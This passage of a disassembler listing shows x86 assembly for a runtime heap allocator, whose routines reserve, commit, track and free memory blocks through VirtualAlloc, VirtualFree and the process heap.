mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_4193FB: ; CODE XREF: sub_4193CB+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_4193FB
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call dword_421180 ; VirtualAlloc
test eax, eax
jnz short loc_41942E
or eax, 0FFFFFFFFh
jmp loc_4194C1
; ---------------------------------------------------------------------------
loc_41942E: ; CODE XREF: sub_4193CB+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_419474
lea eax, [edi+10h]
loc_41943B: ; CODE XREF: sub_4193CB+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_41943B
loc_419474: ; CODE XREF: sub_4193CB+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_4194B1
or [eax+4], edi
loc_4194B1: ; CODE XREF: sub_4193CB+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_4194C1: ; CODE XREF: sub_4193CB+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_4193CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4194C6 proc near ; CODE XREF: sub_41737F+6A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_419674
test bl, 1
jnz loc_41966D
add ebx, ecx
cmp esi, ebx
jg loc_41966D
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_41953D
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_41953D: ; CODE XREF: sub_4194C6+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_41958D
cmp ecx, 20h
jnb short loc_419569
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41958D
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41958D
; ---------------------------------------------------------------------------
loc_419569: ; CODE XREF: sub_4194C6+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41958D
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41958D: ; CODE XREF: sub_4194C6+7D�j
; sub_4194C6+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_41965B
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_4195C7
push 3Fh
pop edi
loc_4195C7: ; CODE XREF: sub_4194C6+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_419649
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_419620
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_419613
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_419613: ; CODE XREF: sub_4194C6+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_419645
; ---------------------------------------------------------------------------
loc_419620: ; CODE XREF: sub_4194C6+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_419636
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_419636: ; CODE XREF: sub_4194C6+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_419645: ; CODE XREF: sub_4194C6+158�j
shr edx, cl
or [eax], edx
loc_419649: ; CODE XREF: sub_4194C6+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_41965E
; ---------------------------------------------------------------------------
loc_41965B: ; CODE XREF: sub_4194C6+E5�j
mov edx, [ebp+arg_4]
loc_41965E: ; CODE XREF: sub_4194C6+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_4197B4
; ---------------------------------------------------------------------------
loc_41966D: ; CODE XREF: sub_4194C6+52�j
; sub_4194C6+5C�j
xor eax, eax
jmp loc_4197B7
; ---------------------------------------------------------------------------
loc_419674: ; CODE XREF: sub_4194C6+49�j
jge loc_4197B4
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_41969F
push 3Fh
pop esi
loc_41969F: ; CODE XREF: sub_4194C6+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_41972E
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_4196B8
push 3Fh
pop esi
loc_4196B8: ; CODE XREF: sub_4194C6+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_419707
cmp esi, 20h
jnb short loc_4196E3
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_419704
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_419704
; ---------------------------------------------------------------------------
loc_4196E3: ; CODE XREF: sub_4194C6+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_419704
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_419704: ; CODE XREF: sub_4194C6+214�j
; sub_4194C6+21B�j ...
mov ebx, [ebp+arg_4]
loc_419707: ; CODE XREF: sub_4194C6+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41972E
push 3Fh
pop esi
loc_41972E: ; CODE XREF: sub_4194C6+1DD�j
; sub_4194C6+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_4197AB
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_419782
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_419775
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_419775: ; CODE XREF: sub_4194C6+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_4197A7
; ---------------------------------------------------------------------------
loc_419782: ; CODE XREF: sub_4194C6+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_419798
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_419798: ; CODE XREF: sub_4194C6+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_4197A7: ; CODE XREF: sub_4194C6+2BA�j
shr edx, cl
or [eax], edx
loc_4197AB: ; CODE XREF: sub_4194C6+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_4197B4: ; CODE XREF: sub_4194C6+1A2�j
; sub_4194C6:loc_419674�j
push 1
pop eax
loc_4197B7: ; CODE XREF: sub_4194C6+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_4194C6 endp
; =============== S U B R O U T I N E =======================================
sub_4197BC proc near ; CODE XREF: sub_418C18+41�p
; sub_419AB4:loc_419C83�p
cmp dword_438620, 0FFFFFFFFh
push ebx
push ebp
push esi
push edi
jnz short loc_4197D0
mov esi, offset off_438610
jmp short loc_4197ED
; ---------------------------------------------------------------------------
loc_4197D0: ; CODE XREF: sub_4197BC+B�j
push 2020h
push 0
push dword_46D164
call dword_42114C ; RtlAllocateHeap
mov esi, eax
test esi, esi
jz loc_4198F9
loc_4197ED: ; CODE XREF: sub_4197BC+12�j
mov ebp, dword_421180
push 4
push 2000h
push 400000h
push 0
call ebp ; VirtualAlloc
mov edi, eax
test edi, edi
jz loc_4198E2
push 4
mov ebx, 10000h
push 1000h
push ebx
push edi
call ebp ; VirtualAlloc
test eax, eax
jz loc_4198D4
mov eax, offset off_438610
cmp esi, eax
jnz short loc_41984C
cmp off_438610, 0
jnz short loc_41983C
mov off_438610, eax
loc_41983C: ; CODE XREF: sub_4197BC+79�j
cmp off_438614, 0
jnz short loc_419861
mov off_438614, eax
jmp short loc_419861
; ---------------------------------------------------------------------------
loc_41984C: ; CODE XREF: sub_4197BC+70�j
mov [esi], eax
mov eax, off_438614
mov [esi+4], eax
mov off_438614, esi
mov eax, [esi+4]
mov [eax], esi
loc_419861: ; CODE XREF: sub_4197BC+87�j
; sub_4197BC+8E�j
lea eax, [edi+400000h]
lea ecx, [esi+98h]
mov [esi+14h], eax
lea eax, [esi+18h]
mov [esi+0Ch], ecx
mov [esi+10h], edi
mov [esi+8], eax
xor ebp, ebp
mov ecx, 0F1h
loc_419883: ; CODE XREF: sub_4197BC+E2�j
xor edx, edx
cmp ebp, 10h
setnl dl
dec edx
and edx, ecx
dec edx
inc ebp
mov [eax], edx
mov [eax+4], ecx
add eax, 8
cmp ebp, 400h
jl short loc_419883
push ebx
push 0
push edi
call sub_415390
add esp, 0Ch
loc_4198AC: ; CODE XREF: sub_4197BC+112�j
mov eax, [esi+10h]
add eax, ebx
cmp edi, eax
jnb short loc_4198D0
or byte ptr [edi+0F8h], 0FFh
lea eax, [edi+8]
mov [edi], eax
mov dword ptr [edi+4], 0F0h
add edi, 1000h
jmp short loc_4198AC
; ---------------------------------------------------------------------------
loc_4198D0: ; CODE XREF: sub_4197BC+F7�j
mov eax, esi
jmp short loc_4198FB
; ---------------------------------------------------------------------------
loc_4198D4: ; CODE XREF: sub_4197BC+63�j
push 8000h
push 0
push edi
call dword_42117C ; VirtualFree
loc_4198E2: ; CODE XREF: sub_4197BC+4B�j
cmp esi, offset off_438610
jz short loc_4198F9
push esi
push 0
push dword_46D164
call dword_421150 ; RtlFreeHeap
loc_4198F9: ; CODE XREF: sub_4197BC+2B�j
; sub_4197BC+12C�j
xor eax, eax
loc_4198FB: ; CODE XREF: sub_4197BC+116�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4197BC endp
; =============== S U B R O U T I N E =======================================
sub_419900 proc near ; CODE XREF: sub_419956+A5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 8000h
push 0
push dword ptr [esi+10h]
call dword_42117C ; VirtualFree
cmp off_43A630, esi
jnz short loc_419925
mov eax, [esi+4]
mov off_43A630, eax
loc_419925: ; CODE XREF: sub_419900+1B�j
cmp esi, offset off_438610
jz short loc_41994D
mov eax, [esi+4]
mov ecx, [esi]
push esi
push 0
mov [eax], ecx
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
push dword_46D164
call dword_421150 ; RtlFreeHeap
pop esi
retn
; ---------------------------------------------------------------------------
loc_41994D: ; CODE XREF: sub_419900+2B�j
or dword_438620, 0FFFFFFFFh
pop esi
retn
sub_419900 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419956 proc near ; CODE XREF: sub_419A6F+3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, off_438614
push edi
loc_419963: ; CODE XREF: sub_419956+B7�j
cmp dword ptr [esi+10h], 0FFFFFFFFh
jz loc_419A01
and [ebp+var_4], 0
lea edi, [esi+2010h]
mov ebx, 3FF000h
loc_41997C: ; CODE XREF: sub_419956+72�j
cmp dword ptr [edi], 0F0h
jnz short loc_4199BD
mov eax, ebx
push 4000h
add eax, [esi+10h]
push 1000h
push eax
call dword_42117C ; VirtualFree
test eax, eax
jz short loc_4199BD
or dword ptr [edi], 0FFFFFFFFh
dec dword_46BB6C
mov eax, [esi+0Ch]
test eax, eax
jz short loc_4199B2
cmp eax, edi
jbe short loc_4199B5
loc_4199B2: ; CODE XREF: sub_419956+56�j
mov [esi+0Ch], edi
loc_4199B5: ; CODE XREF: sub_419956+5A�j
inc [ebp+var_4]
dec [ebp+arg_0]
jz short loc_4199CA
loc_4199BD: ; CODE XREF: sub_419956+2C�j
; sub_419956+46�j
sub ebx, 1000h
sub edi, 8
test ebx, ebx
jge short loc_41997C
loc_4199CA: ; CODE XREF: sub_419956+65�j
cmp [ebp+var_4], 0
mov ecx, esi
mov esi, [esi+4]
jz short loc_419A01
cmp dword ptr [ecx+18h], 0FFFFFFFFh
jnz short loc_419A01
push 1
lea eax, [ecx+20h]
pop edx
loc_4199E1: ; CODE XREF: sub_419956+9A�j
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4199F2
inc edx
add eax, 8
cmp edx, 400h
jl short loc_4199E1
loc_4199F2: ; CODE XREF: sub_419956+8E�j
cmp edx, 400h
jnz short loc_419A01
push ecx
call sub_419900
pop ecx
loc_419A01: ; CODE XREF: sub_419956+11�j
; sub_419956+7D�j ...
cmp esi, off_438614
jz short loc_419A13
cmp [ebp+arg_0], 0
jg loc_419963
loc_419A13: ; CODE XREF: sub_419956+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_419956 endp
; =============== S U B R O U T I N E =======================================
sub_419A18 proc near ; CODE XREF: sub_415C9B+3A�p
; sub_41737F+173�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, offset off_438610
push esi
mov ecx, edx
loc_419A24: ; CODE XREF: sub_419A18+1C�j
cmp eax, [ecx+10h]
jbe short loc_419A2E
cmp eax, [ecx+14h]
jb short loc_419A36
loc_419A2E: ; CODE XREF: sub_419A18+F�j
mov ecx, [ecx]
cmp ecx, edx
jz short loc_419A6B
jmp short loc_419A24
; ---------------------------------------------------------------------------
loc_419A36: ; CODE XREF: sub_419A18+14�j
test al, 0Fh
jnz short loc_419A6B
mov esi, eax
mov edx, 100h
and esi, 0FFFh
cmp esi, edx
jb short loc_419A6B
mov esi, [esp+4+arg_4]
mov [esi], ecx
mov esi, [esp+4+arg_8]
mov ecx, eax
and cx, 0F000h
sub eax, ecx
mov [esi], ecx
sub eax, edx
pop esi
sar eax, 4
lea eax, [eax+ecx+8]
retn
; ---------------------------------------------------------------------------
loc_419A6B: ; CODE XREF: sub_419A18+1A�j
; sub_419A18+20�j ...
xor eax, eax
pop esi
retn
sub_419A18 endp
; =============== S U B R O U T I N E =======================================
sub_419A6F proc near ; CODE XREF: sub_415C9B+4D�p
; sub_41737F+1D5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
lea eax, [eax+ecx*8+18h]
mov ecx, [esp+arg_8]
movzx edx, byte ptr [ecx]
add [eax], edx
and byte ptr [ecx], 0
cmp dword ptr [eax], 0F0h
mov dword ptr [eax+4], 0F1h
jnz short locret_419AB3
inc dword_46BB6C
cmp dword_46BB6C, 20h
jnz short locret_419AB3
push 10h
call sub_419956
pop ecx
locret_419AB3: ; CODE XREF: sub_419A6F+2B�j
; sub_419A6F+3A�j
retn
sub_419A6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419AB4 proc near ; CODE XREF: sub_415C27+4A�p
; sub_41737F+1AC�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, off_43A630
push edi
loc_419AC2: ; CODE XREF: sub_419AB4+C6�j
mov edx, [esi+10h]
cmp edx, 0FFFFFFFFh
jz loc_419B6D
mov edi, [esi+8]
lea ecx, [esi+2018h]
mov eax, edi
sub eax, esi
sub eax, 18h
sar eax, 3
shl eax, 0Ch
add eax, edx
cmp edi, ecx
mov [ebp+var_4], eax
jnb short loc_419B27
loc_419AED: ; CODE XREF: sub_419AB4+6F�j
mov ecx, [edi]
mov ebx, [ebp+arg_0]
cmp ecx, ebx
jl short loc_419B10
cmp [edi+4], ebx
jbe short loc_419B10
push ebx
push ecx
push eax
call sub_419CBC
add esp, 0Ch
test eax, eax
jnz short loc_419B7F
mov eax, [ebp+var_4]
mov [edi+4], ebx
loc_419B10: ; CODE XREF: sub_419AB4+40�j
; sub_419AB4+45�j
add edi, 8
lea ecx, [esi+2018h]
add eax, 1000h
cmp edi, ecx
mov [ebp+var_4], eax
jb short loc_419AED
jmp short loc_419B2A
; ---------------------------------------------------------------------------
loc_419B27: ; CODE XREF: sub_419AB4+37�j
mov ebx, [ebp+arg_0]
loc_419B2A: ; CODE XREF: sub_419AB4+71�j
mov eax, [esi+8]
mov ecx, [esi+10h]
lea edi, [esi+18h]
mov [ebp+var_8], eax
cmp edi, eax
mov [ebp+var_4], ecx
jnb short loc_419B70
loc_419B3D: ; CODE XREF: sub_419AB4+B5�j
mov eax, [edi]
cmp eax, ebx
jl short loc_419B5C
cmp [edi+4], ebx
jbe short loc_419B5C
push ebx
push eax
push [ebp+var_4]
call sub_419CBC
add esp, 0Ch
test eax, eax
jnz short loc_419B7F
mov [edi+4], ebx
loc_419B5C: ; CODE XREF: sub_419AB4+8D�j
; sub_419AB4+92�j
add [ebp+var_4], 1000h
add edi, 8
cmp edi, [ebp+var_8]
jb short loc_419B3D
jmp short loc_419B70
; ---------------------------------------------------------------------------
loc_419B6D: ; CODE XREF: sub_419AB4+14�j
mov ebx, [ebp+arg_0]
loc_419B70: ; CODE XREF: sub_419AB4+87�j
; sub_419AB4+B7�j
mov esi, [esi]
cmp esi, off_43A630
jz short loc_419B8F
jmp loc_419AC2
; ---------------------------------------------------------------------------
loc_419B7F: ; CODE XREF: sub_419AB4+54�j
; sub_419AB4+A3�j
mov off_43A630, esi
sub [edi], ebx
mov [esi+8], edi
jmp loc_419CB7
; ---------------------------------------------------------------------------
loc_419B8F: ; CODE XREF: sub_419AB4+C4�j
mov eax, offset off_438610
mov edi, eax
loc_419B96: ; CODE XREF: sub_419AB4+F8�j
cmp dword ptr [edi+10h], 0FFFFFFFFh
jz short loc_419BA2
cmp dword ptr [edi+0Ch], 0
jnz short loc_419BAE
loc_419BA2: ; CODE XREF: sub_419AB4+E6�j
mov edi, [edi]
cmp edi, eax
jz loc_419C83
jmp short loc_419B96
; ---------------------------------------------------------------------------
loc_419BAE: ; CODE XREF: sub_419AB4+EC�j
mov ebx, [edi+0Ch]
and [ebp+var_4], 0
mov esi, ebx
mov eax, ebx
sub esi, edi
sub esi, 18h
sar esi, 3
shl esi, 0Ch
add esi, [edi+10h]
cmp dword ptr [ebx], 0FFFFFFFFh
jnz short loc_419BDD
loc_419BCC: ; CODE XREF: sub_419AB4+127�j
cmp [ebp+var_4], 10h
jge short loc_419BDD
add eax, 8
inc [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_419BCC
loc_419BDD: ; CODE XREF: sub_419AB4+116�j
; sub_419AB4+11C�j
mov eax, [ebp+var_4]
push 4
shl eax, 0Ch
push 1000h
push eax
push esi
mov [ebp+var_8], eax
call dword_421180 ; VirtualAlloc
cmp eax, esi
jnz loc_419CB5
push 0
push [ebp+var_8]
push esi
call sub_415390
mov edx, [ebp+var_4]
add esp, 0Ch
test edx, edx
mov ecx, ebx
jle short loc_419C44
lea eax, [esi+4]
mov [ebp+var_4], edx
loc_419C1A: ; CODE XREF: sub_419AB4+18E�j
or byte ptr [eax+0F4h], 0FFh
lea edx, [eax+4]
mov [eax-4], edx
mov edx, 0F0h
mov [eax], edx
mov [ecx], edx
mov dword ptr [ecx+4], 0F1h
add eax, 1000h
add ecx, 8
dec [ebp+var_4]
jnz short loc_419C1A
loc_419C44: ; CODE XREF: sub_419AB4+15E�j
mov off_43A630, edi
lea eax, [edi+2018h]
loc_419C50: ; CODE XREF: sub_419AB4+1A8�j
cmp ecx, eax
jnb short loc_419C60
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_419C5E
add ecx, 8
jmp short loc_419C50
; ---------------------------------------------------------------------------
loc_419C5E: ; CODE XREF: sub_419AB4+1A3�j
cmp ecx, eax
loc_419C60: ; CODE XREF: sub_419AB4+19E�j
sbb eax, eax
and eax, ecx
mov [edi+0Ch], eax
mov eax, [ebp+arg_0]
mov [esi+8], al
mov [edi+8], ebx
sub [ebx], eax
sub [esi+4], eax
lea ecx, [esi+eax+8]
lea eax, [esi+100h]
mov [esi], ecx
jmp short loc_419CB7
; ---------------------------------------------------------------------------
loc_419C83: ; CODE XREF: sub_419AB4+F2�j
call sub_4197BC
test eax, eax
jz short loc_419CB5
mov ecx, [eax+10h]
mov [ecx+8], bl
lea edx, [ecx+ebx+8]
mov off_43A630, eax
mov [ecx], edx
mov edx, 0F0h
sub edx, ebx
mov [ecx+4], edx
movzx edx, bl
sub [eax+18h], edx
lea eax, [ecx+100h]
jmp short loc_419CB7
; ---------------------------------------------------------------------------
loc_419CB5: ; CODE XREF: sub_419AB4+143�j
; sub_419AB4+1D6�j
xor eax, eax
loc_419CB7: ; CODE XREF: sub_419AB4+D6�j
; sub_419AB4+1CD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_419AB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419CBC proc near ; CODE XREF: sub_419AB4+4A�p
; sub_419AB4+99�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
push ebx
push esi
mov esi, [ecx+4]
push edi
mov edi, [ecx]
lea ebx, [ecx+0F8h]
cmp esi, edx
mov [ebp+var_4], edi
mov eax, edi
mov [ebp+arg_0], ebx
jb short loc_419D01
lea eax, [edi+edx]
mov [edi], dl
cmp eax, ebx
jnb short loc_419CF0
add [ecx], edx
sub [ecx+4], edx
jmp short loc_419CF9
; ---------------------------------------------------------------------------
loc_419CF0: ; CODE XREF: sub_419CBC+2B�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_419CF9: ; CODE XREF: sub_419CBC+32�j
lea eax, [edi+8]
jmp loc_419DCF
; ---------------------------------------------------------------------------
loc_419D01: ; CODE XREF: sub_419CBC+22�j
add esi, edi
cmp byte ptr [esi], 0
jz short loc_419D0A
mov eax, esi
loc_419D0A: ; CODE XREF: sub_419CBC+4A�j
lea esi, [eax+edx]
cmp esi, ebx
jnb short loc_419D54
loc_419D11: ; CODE XREF: sub_419CBC+96�j
mov bl, [eax]
test bl, bl
jnz short loc_419D47
push 1
lea ebx, [eax+1]
pop esi
loc_419D1D: ; CODE XREF: sub_419CBC+68�j
cmp byte ptr [ebx], 0
jnz short loc_419D26
inc ebx
inc esi
jmp short loc_419D1D
; ---------------------------------------------------------------------------
loc_419D26: ; CODE XREF: sub_419CBC+64�j
cmp esi, edx
jnb short loc_419D78
cmp eax, [ebp+var_4]
jnz short loc_419D34
mov [ecx+4], esi
jmp short loc_419D40
; ---------------------------------------------------------------------------
loc_419D34: ; CODE XREF: sub_419CBC+71�j
sub [ebp+arg_4], esi
cmp [ebp+arg_4], edx
jb loc_419DD9
loc_419D40: ; CODE XREF: sub_419CBC+76�j
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_419D4C
; ---------------------------------------------------------------------------
loc_419D47: ; CODE XREF: sub_419CBC+59�j
movzx esi, bl
add eax, esi
loc_419D4C: ; CODE XREF: sub_419CBC+89�j
lea esi, [eax+edx]
cmp esi, [ebp+arg_0]
jb short loc_419D11
loc_419D54: ; CODE XREF: sub_419CBC+53�j
lea esi, [ecx+8]
loc_419D57: ; CODE XREF: sub_419CBC+EB�j
; sub_419CBC+F2�j
cmp esi, edi
jnb short loc_419DD9
lea eax, [esi+edx]
cmp eax, [ebp+arg_0]
jnb short loc_419DD9
mov al, [esi]
test al, al
jnz short loc_419DA9
push 1
lea ebx, [esi+1]
pop eax
loc_419D6F: ; CODE XREF: sub_419CBC+BA�j
cmp byte ptr [ebx], 0
jnz short loc_419D99
inc ebx
inc eax
jmp short loc_419D6F
; ---------------------------------------------------------------------------
loc_419D78: ; CODE XREF: sub_419CBC+6C�j
lea ebx, [eax+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_419D89
sub esi, edx
mov [ecx], ebx
mov [ecx+4], esi
jmp short loc_419D92
; ---------------------------------------------------------------------------
loc_419D89: ; CODE XREF: sub_419CBC+C2�j
and dword ptr [ecx+4], 0
lea esi, [ecx+8]
mov [ecx], esi
loc_419D92: ; CODE XREF: sub_419CBC+CB�j
mov [eax], dl
add eax, 8
jmp short loc_419DCF
; ---------------------------------------------------------------------------
loc_419D99: ; CODE XREF: sub_419CBC+B6�j
cmp eax, edx
jnb short loc_419DB0
sub [ebp+arg_4], eax
cmp [ebp+arg_4], edx
jb short loc_419DD9
mov esi, ebx
jmp short loc_419D57
; ---------------------------------------------------------------------------
loc_419DA9: ; CODE XREF: sub_419CBC+AB�j
movzx eax, al
add esi, eax
jmp short loc_419D57
; ---------------------------------------------------------------------------
loc_419DB0: ; CODE XREF: sub_419CBC+DF�j
lea ebx, [esi+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_419DC1
sub eax, edx
mov [ecx], ebx
mov [ecx+4], eax
jmp short loc_419DCA
; ---------------------------------------------------------------------------
loc_419DC1: ; CODE XREF: sub_419CBC+FA�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_419DCA: ; CODE XREF: sub_419CBC+103�j
mov [esi], dl
lea eax, [esi+8]
loc_419DCF: ; CODE XREF: sub_419CBC+40�j
; sub_419CBC+DB�j
imul ecx, 0Fh
shl eax, 4
sub eax, ecx
jmp short loc_419DDB
; ---------------------------------------------------------------------------
loc_419DD9: ; CODE XREF: sub_419CBC+7E�j
; sub_419CBC+9D�j ...
xor eax, eax
loc_419DDB: ; CODE XREF: sub_419CBC+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_419CBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419DE0 proc near ; CODE XREF: sub_41737F+19A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
movzx ecx, byte ptr [edx]
push edi
mov edi, [ebp+arg_0]
and [ebp+var_4], 0
mov eax, ebx
sub eax, [edi+10h]
sar eax, 0Ch
cmp ecx, [ebp+arg_C]
lea edi, [edi+eax*8+18h]
jbe short loc_419E1A
mov eax, [ebp+arg_C]
sub ecx, eax
mov [edx], al
add [edi], ecx
